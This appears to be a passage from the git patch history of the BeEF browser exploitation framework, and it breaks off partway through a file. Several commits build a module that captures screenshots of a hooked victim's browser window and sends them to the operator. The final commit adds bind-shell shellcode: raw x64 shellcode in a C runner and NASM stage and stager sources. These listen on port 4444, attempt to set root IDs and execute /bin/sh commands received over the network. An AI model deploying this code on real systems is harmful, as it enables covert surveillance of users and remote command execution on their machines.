+        bounds = _html2canvas.Util.Bounds(options.elements[0]);
+        newCanvas = doc.createElement('canvas');
+        newCanvas.width = bounds.width;
+        newCanvas.height = bounds.height;
+        ctx = newCanvas.getContext("2d");
+
+        ctx.drawImage(canvas, bounds.left, bounds.top, bounds.width, bounds.height, 0, 0, bounds.width, bounds.height);
+        canvas = null;
+        return newCanvas;
+      }
+    }
+
+    return canvas;
+  };
+};
+})(window,document);
\ No newline at end of file
diff --git a/modules/browser/spyder_eye/module.rb b/modules/browser/spyder_eye/module.rb
new file mode 100644
index 000000000..deb328b67
--- /dev/null
+++ b/modules/browser/spyder_eye/module.rb
@@ -0,0 +1,23 @@
+class Spyder_eye < BeEF::Core::Command
+require 'base64'
+
+  def pre_send
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.js', '/html2canvas', 'js')
+  end
+
+	def post_execute 
+    content = {}
+    content['results'] = @datastore['results']
+    save content
+    #I would prefer use common logger but I haven't find the way to do it
+      print "---------[ preth00nker says ]----------\n"
+      print " look for your file in ./beef/"+"SeO_"+@datastore['cid']+".png\n"
+    #e.g. BeEF::Core::Logger.instance.register("spyder eye"," look for your file in ./beef/"+"SeO_"+@datastore['cid']+".png")
+    File.open("SeO_"+@datastore['cid']+'.png', 'wb') do |file| 
+      file.write(Base64.decode64( content['results'] ) ) 
+    end
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/html2canvas.js')
+	end
+
+end
+

From 2420d59a729124468bd22abc2f60aacb95620822 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 11 Sep 2013 15:20:19 +0930
Subject: [PATCH 368/397] Update 'config.yaml' for Spyder Eye module

---
 modules/browser/spyder_eye/config.yaml | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)

diff --git a/modules/browser/spyder_eye/config.yaml b/modules/browser/spyder_eye/config.yaml
index 91a8df2fa..df8ebe47c 100644
--- a/modules/browser/spyder_eye/config.yaml
+++ b/modules/browser/spyder_eye/config.yaml
@@ -1,10 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 beef:
     module:
         spyder_eye:
             enable: true
             category: "Browser"
-            name: "Spyder eye"
-            description: "This module takes a picture of the victim's browser."
+            name: "Spyder Eye"
+            description: "This module takes a picture of the victim's browser window."
             authors: ["preth00nker"]
             target:
                 working:
@@ -19,8 +24,8 @@ beef:
                         max_ver: latest
                     S:
                         min_ver: 6
-                        max_ver: latest3
+                        max_ver: latest
                     O:
                         min_ver: 12
                         max_ver: latest
-                not_working: ["All"]
\ No newline at end of file
+                not_working: ["All"]

From 257a310a02c9ff9abf291a066edd8cef14eda22e Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 11 Sep 2013 15:24:54 +0930
Subject: [PATCH 369/397] Update 'module.rb' for Spyder Eye module

---
 modules/browser/spyder_eye/module.rb | 20 +++++++++++++-------
 1 file changed, 13 insertions(+), 7 deletions(-)

diff --git a/modules/browser/spyder_eye/module.rb b/modules/browser/spyder_eye/module.rb
index deb328b67..8effb91f2 100644
--- a/modules/browser/spyder_eye/module.rb
+++ b/modules/browser/spyder_eye/module.rb
@@ -1,23 +1,29 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 class Spyder_eye < BeEF::Core::Command
-require 'base64'
+  require 'base64'
 
   def pre_send
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.js', '/html2canvas', 'js')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.js', '/html2canvas', 'js')
   end
 
-	def post_execute 
+  def post_execute 
     content = {}
     content['results'] = @datastore['results']
     save content
     #I would prefer use common logger but I haven't find the way to do it
-      print "---------[ preth00nker says ]----------\n"
-      print " look for your file in ./beef/"+"SeO_"+@datastore['cid']+".png\n"
+    # print "---------[ preth00nker says ]----------\n"
+      print_status("Browser screenshot saved to './beef/"+"SeO_"+@datastore['cid']+".png'\n")
     #e.g. BeEF::Core::Logger.instance.register("spyder eye"," look for your file in ./beef/"+"SeO_"+@datastore['cid']+".png")
     File.open("SeO_"+@datastore['cid']+'.png', 'wb') do |file| 
       file.write(Base64.decode64( content['results'] ) ) 
     end
-		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/html2canvas.js')
-	end
+
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/html2canvas.js')
+  end
 
 end
 

From 25aca3d291a899459479abbf612b3543ccb82948 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 11 Sep 2013 15:26:15 +0930
Subject: [PATCH 370/397] Update 'command.js' for Spyder Eye module

---
 modules/browser/spyder_eye/command.js | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/modules/browser/spyder_eye/command.js b/modules/browser/spyder_eye/command.js
index fcb8ffc89..c85781fbc 100644
--- a/modules/browser/spyder_eye/command.js
+++ b/modules/browser/spyder_eye/command.js
@@ -1,4 +1,8 @@
-
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
 
 beef.execute(function() {
 
@@ -20,4 +24,4 @@ beef.execute(function() {
 	});				
 
 
-});
\ No newline at end of file
+});

From 189e6543e0cddbf7d3bfbff8cee6515e094b6d17 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 12 Sep 2013 18:26:00 +0930
Subject: [PATCH 371/397] Fix bug with rendering images from command responses
 in the admin UI

---
 .../media/javascript/ui/panel/common.js       | 29 ++++++++++++-------
 1 file changed, 18 insertions(+), 11 deletions(-)

diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js
index 594237c78..d47e97c40 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/common.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/common.js
@@ -241,7 +241,8 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 				viewConfig: {
 					forceFit:true
 				},
-				
+
+			// render command responses
 		        columns:[new Ext.grid.RowNumberer({width: 20}), {
 			            dataIndex: 'date',
 			            sortable: false,
@@ -249,21 +250,27 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
-								index = index.toString().replace('_', ' ');
-								// Check if the data is the image parameter and that it's a base64 encoded png.
-								if (result.substring(0,28) == "image=data:image/png;base64,") {
-									// Lets display the image
+								result = record.data.data[index];
+								index  = index.toString().replace('_', ' ');
+
+								// Check for a base64 encoded image
+								var header = "image=data:image/(jpg|png);base64,";
+								var re = new RegExp(header, "");
+								if (result.match(re)) {
+
+									// Render the image
 									try {
-										base64_data = window.atob(result.substring(29,result.length));
-										html += String.format('<img src="{0}" /><br>', result.substring(6));
+										var img = result.replace(/[\r\n]/g, '');
+										base64_data = window.atob(img.replace(re, ''));
+										html += String.format('<img src="{0}" /><br>', img.replace(/^image=/, ''));
 									} catch(e) {
-										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										console.log("Received invalid base64 encoded image string: "+e.toString());
 										html += String.format('<b>{0}</b>: {1}<br>', index, result);
 									}
+
+								// output escape everything else, but allow the <br> tag for better rendering.
 								} else {
-									// output escape everything, but allow the <br> tag for better rendering.
-									html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
 								}
 							}
 

From 5942138aba36874d4b9041ddea56ea915d2ebc54 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 12 Sep 2013 18:29:56 +0930
Subject: [PATCH 372/397] Update spyder eye module

* file error handling
* render the screenshot in the admin UI
* log screenshot filename to master logs
---
 modules/browser/spyder_eye/command.js | 17 ++++++-----------
 modules/browser/spyder_eye/module.rb  | 20 +++++++++++++-------
 2 files changed, 19 insertions(+), 18 deletions(-)

diff --git a/modules/browser/spyder_eye/command.js b/modules/browser/spyder_eye/command.js
index c85781fbc..c03d16640 100644
--- a/modules/browser/spyder_eye/command.js
+++ b/modules/browser/spyder_eye/command.js
@@ -12,16 +12,11 @@ beef.execute(function() {
 	$j("body").append( script );
 
 	html2canvas(document.body, {
-	  onrendered: function(canvas) {
-
-        var img = canvas.toDataURL("image/png");
-        var output = img.replace(/^data:image\/(png|jpg);base64,/, "");
-
-    	beef.net.send("<%= @command_url %>", <%= @command_id %>, output);
-    	//beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=All done");
-
-	  }
-	});				
-
+		onrendered: function(canvas) {
+			var img = canvas.toDataURL("image/png");
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+img);
+			//beef.net.send("<%= @command_url %>", <%= @command_id %>, "image=All done");
+		}
+	});
 
 });
diff --git a/modules/browser/spyder_eye/module.rb b/modules/browser/spyder_eye/module.rb
index 8effb91f2..bc756f1eb 100644
--- a/modules/browser/spyder_eye/module.rb
+++ b/modules/browser/spyder_eye/module.rb
@@ -12,14 +12,20 @@ class Spyder_eye < BeEF::Core::Command
 
   def post_execute 
     content = {}
-    content['results'] = @datastore['results']
+    content['results'] = @datastore['results'] if not @datastore['results'].nil?
     save content
-    #I would prefer use common logger but I haven't find the way to do it
-    # print "---------[ preth00nker says ]----------\n"
-      print_status("Browser screenshot saved to './beef/"+"SeO_"+@datastore['cid']+".png'\n")
-    #e.g. BeEF::Core::Logger.instance.register("spyder eye"," look for your file in ./beef/"+"SeO_"+@datastore['cid']+".png")
-    File.open("SeO_"+@datastore['cid']+'.png', 'wb') do |file| 
-      file.write(Base64.decode64( content['results'] ) ) 
+
+    # save screenshot file
+    begin
+      filename = "screenshot_#{Integer(@datastore['cid'])}.png"
+      File.open(filename, 'wb') do |file|
+        data = @datastore['results'].gsub(/^image=data:image\/(png|jpg);base64,/, "")
+        file.write(Base64.decode64(data))
+      end
+      print_info("Browser screenshot saved to '#{filename}'")
+      BeEF::Core::Logger.instance.register("Zombie", "Browser screenshot saved to '#{filename}'")
+    rescue Exception => e
+      print_error("Could not write screenshot file '#{filename}' - Exception: #{e.message}")
     end
 
     BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/html2canvas.js')

From 31587f689be572a6da86ec889bbe0c36bf8088cf Mon Sep 17 00:00:00 2001
From: Dinis Cruz <dinis.cruz@owasp.org>
Date: Fri, 27 Sep 2013 00:59:36 +0100
Subject: [PATCH 373/397] adding into to read me about running beef in windows

---
 README.mkd | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/README.mkd b/README.mkd
index fdeb6146d..d1feda102 100644
--- a/README.mkd
+++ b/README.mkd
@@ -72,3 +72,6 @@ To get started, simply execute beef and follow the instructions:
 
        $ ./beef
 
+On windows use
+
+      $ ruby beef

From fa95ac5b55d38d431011833400d63895d95bbc4a Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Sat, 28 Sep 2013 21:18:23 +0200
Subject: [PATCH 374/397] initial commit of the beef bind shellcode

---
 .../shellcode_sources/linux/x64/socket64.c    |  27 ++
 .../shellcode_sources/linux/x64/stage64.nasm  | 285 +++++++++++++++++
 .../shellcode_sources/linux/x64/stager64.nasm | 106 +++++++
 .../shellcode_sources/linux/x86/socket.c      |  27 ++
 .../shellcode_sources/linux/x86/stage.nasm    | 290 ++++++++++++++++++
 .../shellcode_sources/linux/x86/stager.nasm   | 111 +++++++
 .../msf/beef_bind-handler.rb                  |  73 +++++
 .../msf/beef_bind-stage-linux-x64.rb          |  85 +++++
 .../msf/beef_bind-stage-linux-x86.rb          |  84 +++++
 .../msf/beef_bind-stage-windows-x86.rb        | 137 +++++++++
 .../msf/beef_bind-stager-linux-x64.rb         |  49 +++
 .../msf/beef_bind-stager-linux-x86.rb         |  47 +++
 .../msf/beef_bind-stager-windows-x86.rb       |  62 ++++
 .../shellcode_sources/msf/instructions.txt    |  37 +++
 .../windows/beef_bind_tcp-stage.asm           |  12 +
 .../windows/beef_bind_tcp-stager.asm          |  12 +
 .../shellcode_sources/windows/socket.c        |  36 +++
 .../windows/src/block_api.asm                 |  97 ++++++
 .../windows/src/block_beef_bind-stage.asm     | 177 +++++++++++
 .../windows/src/block_beef_bind-stager.asm    |  47 +++
 .../windows/src/block_bind_tcp.asm            |  63 ++++
 .../windows/src/block_pipes.asm               |  64 ++++
 .../windows/src/block_shell_pipes.asm         |  56 ++++
 .../windows/src/block_sleep.asm               |  15 +
 .../windows/src/block_virtualalloc.asm        |  20 ++
 25 files changed, 2019 insertions(+)
 create mode 100755 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
 create mode 100755 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
 create mode 100755 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/socket.c
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm
 create mode 100644 modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm

diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
new file mode 100755
index 000000000..58fee2877
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/socket64.c
@@ -0,0 +1,27 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+ 
+ The C-skeleton to compile and test this shellcode is used with kind permission of Vivek Ramachandran. A standalone version can be compiled with:
+ #gcc -fno-stack-protector -z execstack -o socket64 socket64.c
+**/
+
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+int (*sc)();
+
+char shellcode[] = "\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48\x01\xc6\xff\xe6";
+
+int main(int argc, char **argv) {
+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
new file mode 100755
index 000000000..2489775d3
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stage64.nasm
@@ -0,0 +1,285 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx,rdx ;zero rdx
+
+	push BYTE 0x02
+	pop r14
+
+	;create two pipes
+createpipes:
+	push rdx ;allocate space on the stack
+	mov rdi, rsp ;point to the stack
+	push BYTE 0x16 
+	pop rax ;sys_pipe
+	syscall
+	dec r14
+	test r14, r14 ;create 2 pipes 
+	je endcreatepipes
+	jmp createpipes
+
+endcreatepipes:
+	;sys_fork
+	push BYTE 0x39
+	pop rax
+	syscall
+	cmp eax, 0x00 ;parent or child?
+	je child
+
+	xor rdi, rdi ; zero rdi
+	mov edi, DWORD [rsp+0x8] ; close read end of one pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;close write end of the other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	;make non-blocking
+	mov edi, DWORD [rsp] ;fd
+	push BYTE 0x04
+	pop rsi ;F_SETFL
+	xor rdx, rdx
+	mov rdx, 0x800 ;O_NONBLOCK
+	push BYTE 0x48
+	pop rax ; sys_fcntl
+	syscall	
+
+
+	;allocate one page of memory
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+doforever:
+	;initialize socket
+	xor rdx, rdx ;zero rdx (proto =0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx  ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1	
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	pop rax ;clean stack
+
+
+	;bind socket to port
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5C110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+	;listen 
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2b
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	;close serversocket
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+
+	mov rcx, 0x1000 ;pagesize
+firstzeromemory:
+	;zero out memory
+	dec rcx
+	mov rbx, r14
+	add rbx, rcx
+	mov BYTE [rbx], 0x00
+	jrcxz readfromsocket
+	jmp firstzeromemory 	
+
+readfromsocket:
+	xor rdx, rdx
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x400 ;read 1024 bytes
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	mov rcx, 0x400 ;search in 1024 bytes 
+	mov rbx, r14 ;ptr to allocated memory
+search:
+	cmp DWORD[rbx], 0x3d646d63 ;compare with "cmd="
+	je found ;cmd= found
+	inc rbx
+	dec rcx
+	jrcxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+found:
+	xor rdi, rdi
+	mov rcx, rbx 
+	add rcx, 0x03 ;skip "cmd"
+	mov rsi, rcx
+	mov edi, DWORD [rsp+0xC] ;write to pipe
+sendcommand:
+	inc rsi ;first time skip "=", move to next byte
+	push BYTE 0x01
+	pop rdx ;write one byte
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+	cmp BYTE [rsi], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push BYTE 0x23
+	pop rax ;sys_nanosleep
+	push DWORD 0x00
+	push DWORD 0x01 ;one second
+	mov rdi, rsp ;ptr to argument array
+	xor rsi, rsi ;NULL
+	syscall
+
+	pop rax ;clean stack
+	pop rax
+
+notfound:
+	call writehttpheaders
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a
+
+writehttpheaders:
+	pop rsi ;source address saved by call
+	mov rdi, r14 ;ptr to allocated memory
+	add rdi, 0x400 ;skip 1024 bytes
+	mov rcx, 0x62 ;copy 98 bytes
+	rep movsb
+
+	xor rdi, rdi ;zero rdi
+	mov edi, DWORD [rsp] ;read from pipe
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 bytes
+	add rsi, 0x62 ;skip header
+	mov rdx, 0xb86 ;read max 2950 bytes	
+	xor rax,rax ;sys_read
+	syscall
+
+
+	mov rdi, r15 ;clientsocket fd
+	mov rsi, r14 ;ptr to allocated memory
+	add rsi, 0x400 ;skip 1024 first bytes
+	mov rdx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x01
+	pop rax ;sys_write
+	syscall
+
+	mov rdi, r15 ;close clientsocket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+	
+	jmp doforever
+child:
+	xor rdi, rdi 
+	mov edi, DWORD [rsp+0xc] ;close output side of pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi ;close stdin
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x08] ;dup input side to stdin
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+
+	mov edi, DWORD [rsp] ;close input side of other pipe
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	xor rdi, rdi
+	inc rdi ;close stdout
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov edi, DWORD [rsp+0x4] ;dup output side to stdout
+	push BYTE 0x20
+	pop rax ;sys_dup
+	syscall
+
+	;setresuid(0,0,0)
+	xor rdi, rdi
+	xor rsi, rsi
+	xor rdx, rdx
+	push BYTE 0x75
+	pop rax ;sys_resuid
+	syscall
+
+	push BYTE 0x3b
+	pop rax ;sys_execve
+	mov rdi, 0x0068732f6e69622f ;/bin/shNULL
+	push rdi ;push to stack
+	mov rdi, rsp ;ptr to stack
+	xor rsi, rsi ;NULL
+	xor rdx, rdx ;NULL
+	syscall
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm
new file mode 100755
index 000000000..1a5d776bb
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x64/stager64.nasm
@@ -0,0 +1,106 @@
+BITS 64
+
+SECTION .text
+global _start
+_start:
+	cld ;clear direction flag
+	xor rdx, rdx ;zero rdx (proto=0)
+	push BYTE 0x01
+	pop rsi ;SOCK_STREAM
+	push BYTE 0x02
+	pop rdi ;AF_INET = 2
+	push BYTE 0x29
+	pop rax ;sys_socket
+	syscall
+	mov rbx, rax ; save socket filediscriptor
+
+	;reuse socket
+	push 0x01  ;true
+	mov r10, rsp ;ptr to optval
+	push BYTE 0x08
+	pop r8 ;sizeof socklen_t
+	push BYTE 0x02
+	pop rdx ;SO_REUSEADDR = 2
+	push BYTE 0x01
+	pop rsi ;SOL_SOCKET = 1
+	mov rdi, rbx ;socketfd
+	push BYTE 0x36 ;sys_setsockopt
+	pop rax
+	syscall
+
+	xor rax,rax
+	push BYTE 0x10
+	pop rdx ;addrlen
+	push rax
+	push rax
+	mov DWORD [rsp], 0x5c110002 ;PORT 0x115c = 4444
+	mov rsi, rsp ;ptr to sokaddr
+	mov rdi, rbx ;socketfd
+	push BYTE 0x31
+	pop rax ;sys_bind
+	syscall
+
+	xor rsi, rsi ;backlog ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x32
+	pop rax ;sys_listen
+	syscall
+
+	;accept
+	xor rdx,rdx ;addrlen ptr = NULL
+	xor rsi,rsi ;sockaddr ptr = NULL
+	mov rdi, rbx ;socketfd
+	push BYTE 0x2B
+	pop rax ;sys_accept
+	syscall
+
+	mov r15, rax ;save client socket fd for later use
+
+	mov rdi, rbx ;close server socket fd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall 
+
+	;allocate memory
+	
+	xor rdi,rdi ;system determines location
+	push 0x1000 ;allocated size
+	pop rsi
+	push BYTE 0x07
+	pop rdx ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push BYTE 0x22
+	pop r10 ; MAP_ANONYMOUS | MAP_PRIVATE
+	push rdi
+	push rdi
+	pop r9 ;offset
+	pop r8 ;fd
+	push BYTE 0x09
+	pop rax
+	syscall
+	mov r14, rax ;save pointer allocated memory for later use
+
+	;read into allocated memory
+	mov rdi, r15 ;client socketfd
+	mov rsi, r14 ;ptr to allocated memory
+	mov dx, 0x1000 ;read one page of memory
+	push BYTE 0x00
+	pop rax ;sys_read
+	syscall
+
+	;close clientsocketfd
+	mov rdi, r15 ;client socketfd
+	push BYTE 0x03
+	pop rax ;sys_close
+	syscall
+
+	mov rsi, r14 ;ptr to allocated memory
+search:
+	cmp DWORD [rsi], 0x3d646d63 ;compare with "cmd="
+	je short found ;cmd= found
+	inc rsi
